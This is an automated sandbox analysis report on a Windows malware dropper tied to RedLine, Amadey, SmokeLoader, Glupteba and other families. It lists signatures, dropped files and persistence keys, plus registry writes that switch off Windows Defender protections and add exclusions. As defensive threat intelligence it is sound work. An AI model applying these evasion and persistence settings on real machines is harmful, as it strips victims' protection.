Malware Analysis Report

2025-01-23 11:29

Sample ID 231010-2586msgg91
Target 0f790705c38d456af7c8a0147e9c35e4.exe
SHA256 3a1a46d10a40bb66b4472a6afc593cb7708e933e7b5354449cdf47b4d528fc94
Tags
amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan mystic lutyr magia
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

3a1a46d10a40bb66b4472a6afc593cb7708e933e7b5354449cdf47b4d528fc94

Threat Level: Known bad

The file 0f790705c38d456af7c8a0147e9c35e4.exe was found to be: Known bad.

Malicious Activity Summary

amadey dcrat glupteba healer redline sectoprat smokeloader 6012068394_99 pixelscloud up3 backdoor google discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan mystic lutyr magia

RedLine payload

Glupteba

Detect Mystic stealer payload

Modifies Windows Defender Real-time Protection settings

Suspicious use of NtCreateUserProcessOtherParentProcess

SectopRAT

Detected google phishing page

DcRat

RedLine

Windows security bypass

SectopRAT payload

Detects Healer an antivirus disabler dropper

Glupteba payload

Healer

Amadey

Mystic

SmokeLoader

Drops file in Drivers directory

Modifies Windows Firewall

Downloads MZ/PE file

Stops running service(s)

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Reads user/profile data of web browsers

Windows security modification

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

Launches sc.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Unsigned PE

Enumerates physical storage devices

Program crash

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

Suspicious use of FindShellTrayWindow

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Creates scheduled task(s)

Suspicious use of UnmapMainImage

Modifies data under HKEY_USERS

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Modifies Internet Explorer settings

Modifies system certificate store

Suspicious use of SendNotifyMessage

Enumerates system info in registry

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 23:11

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 23:11

Reported

2023-10-10 23:14

Platform

win7-20230831-en

Max time kernel

164s

Max time network

190s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Detected google phishing page

phishing google

Detects Healer an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 544 created 1272 N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe C:\Windows\Explorer.EXE

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\819E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\842E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FG2wS5ol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1OG42Qe5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\85D5.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\897E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8EDC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C47D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1C5E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2B2E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3414.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\a9777033.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\819E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\819E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FG2wS5ol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FG2wS5ol.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP006.TMP\1OG42Qe5.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8EDC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C47D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C47D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C47D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C47D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C47D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C47D.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\31839b57a4f11171d6abc8bbc4451ee4.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\8CE8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\kx4St2pf.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\IB0tc6CQ.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Ok8bG1wv.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\FG2wS5ol.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\0f790705c38d456af7c8a0147e9c35e4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\v4499542.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\819E.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7FD0E911-67C2-11EE-8C03-7EFDAE50F694} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 102c0c61cffbd901 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7F6E2FA1-67C2-11EE-8C03-7EFDAE50F694} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3849525425-30183055-657688904-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000bbd2da6efca7814e97bd67c6ea97aa8b000000000200000000001066000000010000200000004c99a625b3bec901614e239406c17896644c7539db85de90cc834afda0d169b8000000000e8000000002000020000000118694e9f8cd26a3e66c4fa55b97dcdd10e758d1ef00817a75f5cb004e1974f120000000ba30b45e700e3b5808310c74437540c83097fbe073f0b0b61b847ba1b751df3340000000d52a4e729970a07b3ab19be4c60ece2a6fe4359d7d7dfe4c5c14268dc54325a730d1c0655c7c6d23616e62804412ba741de10af3a31382e898be14464f5c0812 C:\Program Files\Internet Explorer\iexplore.exe N/A
